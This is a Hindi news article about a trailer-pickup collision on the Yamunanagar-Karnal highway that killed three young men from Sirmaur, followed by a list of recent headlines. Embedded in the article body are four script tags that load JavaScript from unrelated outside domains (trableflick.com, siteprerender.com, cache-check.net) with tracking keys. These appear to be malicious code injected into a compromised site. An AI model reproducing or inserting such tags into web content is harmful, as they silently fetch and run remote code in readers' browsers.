यमुनानगर करनाल हाइवे पर पिकअप और ट्राले में भिडंत, सिरमौर के 3 युवकों की मौत

<p>हरियाणा के करनाल में आज सुबह यमुनानगर-करनाल हाइवे पर एक दर्दनाक हादसा सामने आया है। हादसे में तेज़ रफ्तार ट्राले ने पिकअप को जोरदार टक्कर मार दी। जिसमें हिमाचल के सिरमौर जिले के तीन युवकों की मौत हो गई।</p>

<p>जानकारी के अनुसार सिरमौर के रहने वाले चार युवक टमाटर लेकर दिल्ली जा रहे थे। सलारी गांव के पास पिकअप का टायर पंचर हो गया। इस दौरान पिकअप चालक टायर बदल रहा था जबकि अन्य दो युवक वहीं साथ ही खड़े थे। इसी दौरान इंद्री की ओर से तेज रफ्तार आ रहे ट्राले ने उन्हें टक्कर मार दी जिसमें 3 युवकों की मौत हो गई। हादसा इतना जोरदार था कि पिकअप के परखच्चे ही उड़ गए। &nbsp;</p>

<p>बताया जा रहा है कि तीनों युवक शिलाई के भटनोल के रहने वाले थे। मृतकों की पहचान योगराज, सुनील और गोलू के रूप में हुई है। हादसे की सूचना मिलते ही करनाल पुलिस भी मौके पर पहुंची और जांच शुरू कर दी है। ट्रक चालक फरार है जिसकी तलाश जारी है। ख़बर है कि एक अन्य युवक हादसे के वक्त दूर जाकर गिरा है जो लिहाजा सुरक्षित है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1603886053892″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

विधायकों की खरीद-फरोख्त मामला: हेलिकॉप्टर कंपनी के अधिकारी से शिमला में पूछताछ

MLABriberyCase: विधायकों की खरीद-फरोख्त और सरकार को अस्थिर करने के मामले में जांच के तहत…

5 hours ago

हरियाणा में बीजेपी तीसरी बार, जम्मू-कश्मीर में NC-कांग्रेस की सरकार

Elections2024: हरियाणा में भाजपा कांग्रेस के मुंह से जीत छीनकर लगातार तीसरी बार सरकार बनाने…

5 hours ago

युनूस बने निदेशक उद्योग, विवेक भाटिया को मिला पर्यटन विभाग

Transfers 8 IAS and 1 IFS:  मंगलवार देर सायं राज्य सरकार ने 8 आईएएस और…

6 hours ago

Himachal: धर्मशाला से पूर्व भाजपा प्रत्याशी राकेश चौधरी का निधन

Poison Incident: जहरीला पदार्थ निगलने के बाद टांडा अस्‍पताल में भर्ती  धर्मशाला से दो बार…

10 hours ago

शोभा यात्रा से शुरू होगा शाहपुर दशहरा उत्सव, ‘बेटी है अनमोल’ को समर्पित दूसरी सांस्कृतिक संध्या

  Shahpur Dussehra Festival 2024:  उपमुख्य सचेतक केवल सिंह पठानिया ने जानकारी दी है कि…

10 hours ago